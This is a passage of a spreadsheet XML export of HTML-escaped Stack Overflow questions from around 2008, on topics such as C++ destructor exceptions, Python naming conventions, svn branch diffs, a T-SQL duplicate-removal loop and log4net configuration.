With no-throw destructors we also find ourselves having to create "reset()" functions that are supposed to be called before destruction - but that just defeats the whole purpose of RAII.&lt;/p&gt;
&lt;p&gt;Another approach is just to &lt;a href="http://www.kolpackov.net/projects/c++/eh/dtor-1.xhtml"&gt;let the program terminate&lt;/a&gt;, as it's the most predictable thing you can do.&lt;/p&gt;
&lt;p&gt;Some people suggest chaining exceptions, so that more than one error can be handled at a time. But I honestly never actually seen that done in C++ and I've no idea how to implement such a thing.&lt;/p&gt;
&lt;p&gt;So it's either RAII or exceptions. Isn't it? I'm leaning toward no-throw destructors; mainly because it keeps things simple(r). But I really hope there's a better solution, because, as I said, the more we use RAII, the more we find ourselves using dtors that do non-trivial things.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Appendix&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I'm adding links to interesting on-topic articles and discussions I've found:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://www.kolpackov.net/projects/c++/eh/dtor-1.xhtml"&gt;Throwing Destructors&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;StackOverflow discussion on the &lt;a href="http://stackoverflow.com/questions/164372/is-there-a-good-way-around-the-problems-of-structured-exception-handling-try-ex"&gt;problems with SEH&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;StackOverflow discussion on &lt;a href="http://stackoverflow.com/questions/130117/throwing-exceptions-out-of-a-destructor#130123"&gt;throwing-destructors&lt;/a&gt; (thanks, Martin York)&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.joelonsoftware.com/items/2003/10/13.html"&gt;Joel on Exceptions&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://blogs.msdn.com/larryosterman/archive/2004/09/10/228068.aspx"&gt;SEH Considered Harmful&lt;/a&gt; &lt;/li&gt;
&lt;li&gt;&lt;a href="http://bartdesmet.net/blogs/bart/archive/2006/04/04/clr-exception-handling-from-a-to-z-everything-you-didn-t-want-to-know-about-try-catch-finally-fault-filter.aspx"&gt;CLR Exception Handling&lt;/a&gt; which also touches on exception chaining&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.gotw.ca/gotw/047.htm"&gt;Herb Sutter on std::uncaught_exception&lt;/a&gt; and why it's not as useful as you think&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.cpptalk.net/1-vt12438.html?postdays=0&amp;amp;postorder=asc&amp;amp;start=0"&gt;Historical discussion&lt;/a&gt; on the matter with interesting participants (long!)&lt;/li&gt;
&lt;li&gt;Stroustrup explaining &lt;a href="http://www.research.att.com/~bs/bs_faq2.html#finally"&gt;RAII&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Andrei Alexandrescu's &lt;a href="http://www.ddj.com/cpp/184403758"&gt;Scope Guard&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Do OCUnit and OCMock work on the iPhone SDK?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I simply could not make it work, and I am wondering if I am wasting my time, or if I am simply stupid!&lt;/p&gt;
&lt;p&gt;Sorry I don't have the exact error I have right now. But I just want to know if it work or not!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What tasks do you use JavaScript for the most?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What types of JavaScript scripts do find most useful in your work? What tasks do you use JavaScript for the most? Are there scripts that you wished were out there but just haven't been able to find? I'm trying to create a library of MooTools plugins and so I'm always looking for inspiration and advice. I'm trying to concentrate on utility more than anything else, but any suggestions are okay. I'm really not looking for code examples but rather descriptions of the tasks that you most often perform or would like to perform with JavaScript.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Reset Expander to default collapse behavior</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using an expander inside a &lt;a href="http://kentb.blogspot.com/2007/04/resizer-wpf-control.html" rel="nofollow"&gt;Resizer&lt;/a&gt; (a ContentControl with a resize gripper), and it expands/collapses properly when the control initially comes up.  Once I resize it, the Expander won't properly collapse, as documented below.  I ran Snoop on my application, and I don't see any heights set on Expander or its constituents.  &lt;/p&gt;
&lt;p&gt;How would I go about convincing Expander to collapse properly again?  Or modifying Resizer to not make Expander sad would work as well.&lt;/p&gt;
&lt;p&gt;Expander documentation says:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;"For an Expander to work correctly, do not specify a Height on the Expander control when the ExpandDirection property is set to Down or Up. Similarly, do not specify a Width on the Expander control when the ExpandDirection property is set to Left or Right. When you set a size on the Expander control in the direction that the expanded content is displayed, the area that is defined by the size parameter is displayed with a border around it. This area displays even when the window is collapsed. To set the size of the expanded window, set size dimensions on the content of the Expander control or the ScrollViewer that encloses the content."&lt;/p&gt;
&lt;/blockquote&gt;
</t>
  </si>
  <si>
    <t>Way to go from recursion to iteration</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've used recursion quite a lot on my many years of programming to solve simple problems, but I'm fully aware that sometimes you need iteration due to memory/speed problems.&lt;/p&gt;
&lt;p&gt;So, sometime in the very far past I went to try and find if there existed any "pattern" or text-book way of transforming a common recursion approach to iteration and found nothing. Or at least nothing that I can remember it would help.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Are there general rules?&lt;/li&gt;
&lt;li&gt;Is there a "pattern"?&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>What is the best client side browser library to upload multiple files over http?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best client side http library to upload multiple files? If it can handle directories that's a huge bonus. I'm looking for something that is open source or free. I'm looking for something like FTP, but that works over http, through the browser. Uploading multiple files through a normal HTML 4.x form is a bit of a hassle when it comes to uploading more than 5-6 files.&lt;/p&gt;
&lt;p&gt;Feel free to share your personal experiences.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the naming convention in Python for variable and function names?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Coming from a C# background the naming convention for variables and method names are usually either CamelCase or Pascal Case:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// C# example
string thisIsMyVariable = "a"
public void ThisIsMyMethod()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In Python, I have seen the above but I have also seen underscores being used:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# python example
this_is_my_variable = 'a'
def this_is_my_function():
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there a more preferable, definitive coding style for Python?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Determine if a program is running on a Remote Desktop</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way my program can determine when it's running on a Remote Desktop (Terminal Services)?&lt;/p&gt;
&lt;p&gt;I'd like to enable an "inactivity timeout" on the program when it's running on a Remote Desktop session.  Since users are notorious for leaving Remote Desktop sessions open, I want my program to terminate after a specified period of inactivity.  But, I don't want the inactivity timeout enabled for non-RD users.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Changing short date format in Ubuntu</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I change the system-wide short date format in Ubuntu?  For example, Thunderbird is showing dates in the DD/MM/YY format, and I would like to change it to MM/DD/YY or YYYY-MM-DD.&lt;/p&gt;
&lt;p&gt;The best information I can find so far is in this thread:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://ubuntuforums.org/showthread.php?t=193916" rel="nofollow"&gt;http://ubuntuforums.org/showthread.php?t=193916&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Edit: I want to change the system-wide date format, so that all my applications use this new date format.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the difference between Ruby and Python versions of"self"?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've done some Python but have just now starting to use Ruby&lt;br /&gt;
I could use a good explanation of the difference between "self" in these two languages.  &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Obvious on first glance:&lt;/strong&gt;&lt;br /&gt;
Self is not a keyword in Python, but there is a "self-like" value no matter what you call it.&lt;br /&gt;
Python methods receive self as an explicit argument, whereas Ruby does not.&lt;br /&gt;
Ruby sometimes has methods explicitly defined as part of self using dot notation.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Initial Googling reveals&lt;/strong&gt;&lt;br /&gt;
&lt;a href="http://rubylearning.com/satishtalim/ruby_self.html"&gt;http://rubylearning.com/satishtalim/ruby_self.html&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.ibiblio.org/g2swap/byteofpython/read/self.html"&gt;http://www.ibiblio.org/g2swap/byteofpython/read/self.html&lt;/a&gt;  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to put breakpoint in every function of .cpp file?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a macro that does it? Which DTE objects to use?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Finding the time taken to send messages with WCF net.tcp</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Iâ€™m writing a prototype WCF enabled distributed app, to try and find out any issues Iâ€™ll have upgrading my existing â€œsending xml over tcp to communicateâ€ apps Iâ€™ve got.  Iâ€™m using Callback Contracts to register clients with a server (Singleton in ServiceHost) and so far all the communications between client and server work.  I can connect multiple clients to the server and send a broadcast from the server that is received by all clients.  I can block a particular client and the other clients still receive the calls.  This is good.&lt;/p&gt;
&lt;p&gt;To continue my learning and evaluation of performance I would like the client to record what time the server sends each message, as well as what time the client receives that same message.  How should I best go about this?&lt;/p&gt;
&lt;p&gt;Is there something similar to SOAP extensions, where I can add to the outgoing from the server and incoming to the client?  Or would I need to add a â€œtimeSentâ€ parameter to every method that the server calls on the client and record the time received on the client (yuck!)? Is there a better way to accomplish this?&lt;/p&gt;
&lt;p&gt;I am using net.tcp rather than wsDualHttpBinding (which also works but is less performant).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Flex: Modify an embedded icon and use it in a button?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Just that, if you embed an icon:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[Embed(source='icons/checkmark.png')]
private static var CheckMark:Class;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;You end up with a dynamic class. You can pretty easily assign the icon to a button at runtime by calling the setStyle method:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var btn:Button = new Button();
btn.setStyle("icon", CheckMark);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But what if you wanted to alter the icon at runtime, like changing it's alpha value or even redrawing pixels, before assigning it to the button?&lt;/p&gt;
&lt;p&gt;So far I can't find a satisfactory answer...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>should I free pointer returned by getpwuid() in Linux?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;After I call getpwuid(uid), I have a reference to a pointer. Should I free that when I don't use it anymore? Reading the man pages, it says that it makes reference to some static area, that may be overwritten by subsequent calls to the same functions, so I'm sure sure if I should touch that memory area.&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What svn command would list all the files modified on a branch?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In svn, I have a branch which was created, say at revision 22334. Commits were then made on the branch.&lt;/p&gt;
&lt;p&gt;How do I get a list of all files that were changed on the branch compared to what's on the trunk? I do not want to see files that were changed on the trunk between when the branch was created and "now".&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ZIP Code (US Postal Code) validation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I thought people would be working on little code projects together, but I don't see them, so here's an easy one:&lt;/p&gt;
&lt;p&gt;Code that validates a valid US Zip Code. I know there are ZIP code databases out there, but there are still uses, like web pages, quick validation, and also the fact that zip codes keep getting issued, so you might want to use weak validation.&lt;/p&gt;
&lt;p&gt;I wrote a little bit about zip codes in a side project on my wiki/blog:&lt;/p&gt;
&lt;p&gt;https://benc.fogbugz.com/default.asp?W24&lt;/p&gt;
&lt;p&gt;There is also a new, weird type of zip code. &lt;/p&gt;
&lt;p&gt;https://benc.fogbugz.com/default.asp?W42&lt;/p&gt;
&lt;p&gt;I can do the javascript code, but it would be interesting to see how many languages we can get here.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Run custom Javascript whenever a client-side ASP.NET validator is triggered?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to run some custom Javascript whenever a client-side ASP.NET validator (RequiredFieldValidator, RangeValidator, etc) is triggered? &lt;/p&gt;
&lt;p&gt;Basically, I have a complicated layout that requires I run a custom script whenever a DOM element is shown or hidden. I'm looking for a way to automatically run this script when a validator is displayed. (I'm using validators with Display="dynamic")&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Run Sparc binaries without Sparc hardware</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been curious in the past few months in trying my hand at doing some assembly for the SPARC processor (either V8 or V9). My question is this, I have no access to a SPARC machine, is there a way I can run SPARC binaries on my x86 machine? I've looked at QEMU but I am not too sure how to set it up.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Generating random numbers in Objective-C</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm a Java head mainly, and I want a way to generate a pseudo-random number between 0 and 74. In Java I would use the method:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Random.nextInt(74)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm not interested in a discussion about seeds or true randomness, just how you accomplish the same task in Objective-C. I've scoured Google, and there just seems to be lots of different and conflicting bits of information.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I check if an integer is even or odd?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I check if a given number is even or odd in C?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Error: initializer element is not computable at load time</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have in a function that takes a struct, and I'm trying to store its variables in an array, but I get this when I run gcc -Wall -ansi -pedantic-errors -Werror&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int detect_prm(Param prm) {
  int prm_arr[] = {prm.field1, prm.field2, prm.field3};
  return 0;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I get Error: initializer element is not computable at load time when I try to compile the above.  It looks fine to me, whats wrong?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I invoke a Java method when given the method name as a string?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I have two variables:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Object obj;
String methodName = "getName";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Without knowing the class of &lt;code&gt;obj&lt;/code&gt;, how can I call the method identified by &lt;code&gt;methodName&lt;/code&gt; on it?&lt;/p&gt;
&lt;p&gt;The method being called has no parameters, and a &lt;code&gt;String&lt;/code&gt; return value. It's &lt;em&gt;a getter for a Java bean&lt;/em&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In .NET is there a way to enable Assembly.Load tracing?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In .NET is there a way to enable Assembly.Load tracing? I know while running under the debugger it gives you a nice message like "Loaded 'assembly X'" but I want to get a log of the assembly loads of my running application outside the debugger, preferably intermingled with my Debug/Trace log messages. &lt;/p&gt;
&lt;p&gt;I'm tracing out various things in my application and I basically want to know what action triggered a particular assembly to be loaded.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I force a tomcat web application reload the trust store after I update it</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following problem.
My tomcat 5.5 based web application is using a trust store to verify SSL connections.
The application allows the user to add or remove CA certificates to be used in the verification process.
However, adding or removing certificates from the trust store doesn't change a thing. The application 'recognizes' only the certificates that were in the trust store when tomcat started. For it to recognize the new set of certificates, I need to restart tomcat.&lt;/p&gt;
&lt;p&gt;This is not a valid solution, however.
What I do need is a code based solution.
Please advice.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I determine the file and line # of a C# method from a symbols (.pdb) file?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;pdb files contain symbol information for .NET assemblies. I'd like to read a pdb file in order to correlate methods with their file location. The data is contained within it but I can't seem to find a good description of how to get it out.&lt;/p&gt;
&lt;p&gt;I know about &lt;a href="http://blogs.msdn.com/jmstall/archive/2005/08/25/pdb2xml.aspx" rel="nofollow"&gt;mdbg&lt;/a&gt;, but that is very heavy (I think/hope) for what I want.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>FTP File Upload with HTTP Proxy</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to upload a file to a FTP server when behind an HTTP proxy ?&lt;/p&gt;
&lt;p&gt;It seems that uploading a file is not supported behind an HTTP Proxy using .Net Webclient. (&lt;a href="http://msdn.microsoft.com/en-us/library/system.net.ftpwebrequest.proxy.aspx"&gt;http://msdn.microsoft.com/en-us/library/system.net.ftpwebrequest.proxy.aspx&lt;/a&gt;).&lt;/p&gt;
&lt;p&gt;If there is no workaround ? If not, do you know a good and free FTP library I can use ?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit&lt;/strong&gt;: Unfortunately, I don't have any FTP proxy to connect to.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Access to remote computer's MSMQ gives "Remote computer is not available"</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a windows application that runs on a server and accesses 4 other servers (all of them are members in the domain) to get the messages in each of their private queues. We've just installed a new server, and for some reason when the application tries to access that computer, it gets a "Remote computer is not available" message.&lt;br /&gt;
The application accesses the other servers with a user who is an admin domain user.&lt;br /&gt;
Has anyone encountered such a problem, or have a clue as to what could be causing it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Unit Testing: Maven or Eclipse?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am not really familiar with Maven program but I've been using Eclipse for quite a while for Unit testing, code coverage, javadoc generation, code style checking, etc. Probably, the only main thing that I didn't really like about Eclipse is the "compilation errors" that it generates when you are running Eclipse and Ant simultaneously. So I am wondering if Maven 2 does the same thing if you are running Ant task.&lt;/p&gt;
&lt;p&gt;Lee23 &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Referenced structure not 'sticking'</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am currently porting a lot of code from an MFC-based application to a DLL for client branding purposes.&lt;/p&gt;
&lt;p&gt;I've come across an unusual problem. This bit of code is the same in both systems:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// ...
    CCommsProperties props;
    pController-&amp;gt;GetProperties( props );
    if (props.handshake != HANDSHAKE_RTS_CTS) 
    {
    	props.handshake = HANDSHAKE_RTS_CTS;
    	pController-&amp;gt;RefreshCommProperties( props );
    }
// ... in another file: 
void CControllerSI::RefreshCommProperties ( const CCommsProperties&amp;amp; props )
{
    // ... code ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;CommProperties is a wrapper for the comm settings, serialization of etc. and pController is of type ControllerSI which itself is a layer between the actual Comms and the Application.&lt;/p&gt;
&lt;p&gt;On the original MFC version the setting of handshake to RTS-CTS sticks but when running as the DLL version it resets itself to 0 as soon as the function is entered. The code is contained entirely in the DLL section of the code, so there are no boundaries.&lt;/p&gt;
&lt;p&gt;The main differences between the original and the new modules is the variables that call the various dialogs have been removed and the removed #includes&lt;/p&gt;
&lt;p&gt;I've lost an afternoon to this and I don't really want to lose any more...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>'pass parameter by reference' in Ruby?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Ruby, is it possible to pass by reference a parameter with value-type semantics (e.g. a Fixnum)?
I'm looking for something similar to C#'s '&lt;strong&gt;ref&lt;/strong&gt;' keyword.&lt;/p&gt;
&lt;p&gt;Example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def func(x) 
    x += 1
end
a = 5
func(a)  #this should be something like func(ref a)
puts a   #should read '6'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Btw. I know I could just use:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;a = func(a)
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Where is GDB documentation specific to the Cell Linux environment?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Where can documentation be found for the features of GDB, and the debugging process, specific to debugging of Cell Linux programs mixing PPU and SPU code?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I launch a standalone SWF from within an Adobe AIR application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm completely new to AIR but what I'm trying to do feels like it should be quite easy.&lt;/p&gt;
&lt;p&gt;I want my AIR app to execute (launch) an SWF in the standalone Flash Player (just like if I were to double click it). &lt;/p&gt;
&lt;p&gt;Please note that I don't want the AIR app to embed the SWF. Just run it.&lt;/p&gt;
&lt;p&gt;Can this be done?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>initialize a const array in a class initializer in C++</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following class in C++:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class a {
    const int b[2];
    // other stuff follows
    // and here's the constructor
    a(void);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The question is, how do I initialize b in the initialization list, given that I can't initialize it inside the body of the function of the constructor, because b is &lt;code&gt;const&lt;/code&gt;?&lt;/p&gt;
&lt;p&gt;This doesn't work:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;a::a(void) : 
    b([2,3])
{
     // other initialization stuff
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Edit:  The case in point is when I can have different values for &lt;code&gt;b&lt;/code&gt; for different instances, but the values are known to be constant for the lifetime of the instance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you track the time of replicated rows for Subscribers in SQL Server 2005?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The basic problem is like this:&lt;br /&gt;
A subscriber has successfully replicated a row from the publisher, using transactional replication. Now, how do we keep track the time of this row being last successfully replicated?  &lt;/p&gt;
&lt;p&gt;A friend has suggested the following solution, which he used for his SQL Server 2000:&lt;br /&gt;
1) Add a datetime column.&lt;br /&gt;
2) Change the replication stored procedure to update the datetime column (!).&lt;/p&gt;
&lt;p&gt;The step #2 sets off all sorts of warning bells within me, so I'm asking if there are better solutions for SQL Server 2005 in this situation, before I even go into detail with his solution. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>If I stop a long running query, does it rollback?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;A query that is used to loop through &lt;b&gt;17 millions records to remove duplicates&lt;/b&gt;  has been running now for about &lt;b&gt;16 hours&lt;/b&gt; and I wanted to know if the query is stopped right now if it will finalize the delete statements or if it has been deleting while running this query? Indeed, if I do stop it, does it finalize the deletes or rolls back?&lt;/p&gt;
&lt;p&gt;I have found that when I do a &lt;/p&gt;
&lt;pre&gt;&lt;code&gt; select count(*) from myTable
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That the rows that it returns (while doing this query) is about 5 less than what the starting row count was. Obviously the server resources are extremely poor, so does that mean that this process has taken 16 hours to find 5 duplicates (when there are actually thousands), and this could be running for days?&lt;/p&gt;
&lt;p&gt;This query took 6 seconds on 2000 rows of test data, and it works great on that set of data, so I figured it would take 15 hours for the complete set.&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
&lt;p&gt;Below is the query:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;--Declare the looping variable
DECLARE @LoopVar char(10)
    DECLARE
     --Set private variables that will be used throughout
      @long DECIMAL,
      @lat DECIMAL,
      @phoneNumber char(10),
      @businessname varchar(64),
      @winner char(10)
    SET @LoopVar = (SELECT MIN(RecordID) FROM MyTable)
    WHILE @LoopVar is not null
    BEGIN
      --initialize the private variables (essentially this is a .ctor)
      SELECT 
        @long = null,
        @lat = null,
        @businessname = null,
        @phoneNumber = null,
        @winner = null
      -- load data from the row declared when setting @LoopVar  
      SELECT
        @long = longitude,
        @lat = latitude,
        @businessname = BusinessName,
        @phoneNumber = Phone
      FROM MyTable
      WHERE RecordID = @LoopVar
      --find the winning row with that data. The winning row means 
      SELECT top 1 @Winner = RecordID
      FROM MyTable
      WHERE @long = longitude
        AND @lat = latitude
        AND @businessname = BusinessName
        AND @phoneNumber = Phone
      ORDER BY
        CASE WHEN webAddress is not null THEN 1 ELSE 2 END,
        CASE WHEN caption1 is not null THEN 1 ELSE 2 END,
        CASE WHEN caption2 is not null THEN 1 ELSE 2 END,
        RecordID
      --delete any losers.
      DELETE FROM MyTable
      WHERE @long = longitude
        AND @lat = latitude
        AND @businessname = BusinessName
        AND @phoneNumber = Phone
        AND @winner != RecordID
      -- prep the next loop value to go ahead and perform the next duplicate query.
      SET @LoopVar = (SELECT MIN(RecordID) 
    FROM MyTable
    WHERE @LoopVar &amp;lt; RecordID)
    END
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Fire Async method on page load with AJAX</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using ASP.NET 2.0 with AJAX Extensions (1.0?) and am wondering if it is possible to call a method asynchronously and have the results populate on the page after it has been loaded.&lt;/p&gt;
&lt;p&gt;I have a gridview that is populated by a fairly long-running SQL query. I would prefer to have the page come up and the results trickle back in as they are returned from the server instead of forcing the user to stare at a blank page until everything is processed.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the role of Spring in Struts + Spring + Hibernate?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What role is Spring taking in Struts + Spring + Hibernate?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>const int vs. int const as function parameter in C++ and C</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Quick question: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int testfunc1 (const int a)
{
  return a;
}
int testfunc2 (int const a)
{
  return a;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Are these two functions the same in every aspect or is there a difference? I'm interested in an answer for the C-language, but if there is something interested in the C++ case I'd like to know as well. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to script diagrams in SQL 2000 (or save them another way)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It's possible to create digrams in SQL Server 2000 that can be useful to show the relationships between tables.  The problem we run into is that when somebody refreshes our development database, the diagrams get lost.  We can load tables, stored procedures, views, etc. with SQL scripts, but we have to create the diagrams by hand.&lt;/p&gt;
&lt;p&gt;Is there a way to script out the diagrams?  Or can they be saved outside of the database some other way?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I detect "Easter Egg" mode in my Palm OS application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Since the early days, Palm OS has had a special "easter egg" mode that's enabled by making the right gesture in one of the Preference panels.  On current Palm Treo and Centro devices, this is turned on by doing a clockwise swirl above the "Tips" button in the Power panel.&lt;/p&gt;
&lt;p&gt;Some applications, like the Blazer web browser, enable special features when easter eggs are active.  How can I detect this in my own program?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>The value of hobby game development</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does attempting to develop some sort of game, even just as a hobby during leisure time provide useful (professional) experience or is it a childish waste of time?&lt;/p&gt;
&lt;p&gt;I have pursued small personal game projects on and off throughout my programming career. I've found the (often) strict performance requirements and escalating design complexity have taught me some of my most useful programming lessons.  &lt;/p&gt;
&lt;p&gt;In these projects to name just a few, I very quickly came face to face with: "Everything is fast for small N".  I also discovered the hard way about using basic object oriented design principles to manage complexity.&lt;/p&gt;
&lt;p&gt;In a field where many technologies and topics can be quite dry/dull, I think hobby game development is important in motivating new (and not so new) developers to brush up on essential skills while having fun at the same time. &lt;/p&gt;
&lt;p&gt;&lt;a href="http://stackoverflow.com/questions/157319/do-you-have-a-hobby-development-project"&gt;This question&lt;/a&gt; talks about hobby projects in general, however here I am more interested in game projects specially and how valuable they are to professional programmers.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Rendered pIxel width data for each character in a browser's font</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a table column that needs to be limited to a certain width - say 100 pixels.  At times the text in that column is wider than this and contains no spaces. For example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;a_really_long_string_of_text_like_this_with_no_line_breaks_makes_the_table_unhappy
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I would like to calculate the width of text server-side and add an ellipsis after the correct number of characters.  The problem is that I don't have data about the rendered size of the text.&lt;/p&gt;
&lt;p&gt;For example, assuming the browser was Firefox 3 and the font was 12px Arial.  What would be the width of the letter "a", the width of the letter "b", etc.?&lt;/p&gt;
&lt;p&gt;Do you have data showing the pixel width of each character?  Or a program to generate it?&lt;/p&gt;
&lt;p&gt;I think a clever one-time javascript script could do the trick.  But I don't want to spend time re-inventing the wheel if someone else has already done this.  I am surely not the first person to come up against this problem.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you log the machine name via log4net?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using Log4Net with the AdoNetAppender to log messages from a simple systray application into a SQL Server 2005 database.&lt;/p&gt;
&lt;p&gt;I want to log the machine name along with the log message because this application will be running on multiple machines and I need to know on which one the message originated.&lt;/p&gt;
&lt;p&gt;But, I cannot find a way to expose this information via the log4net.Layout.PatternLayout that I am using with the appender.&lt;/p&gt;
&lt;p&gt;Is there a way to log the machine name via log4net in this manner?&lt;/p&gt;
</t>
  </si>
  <si>
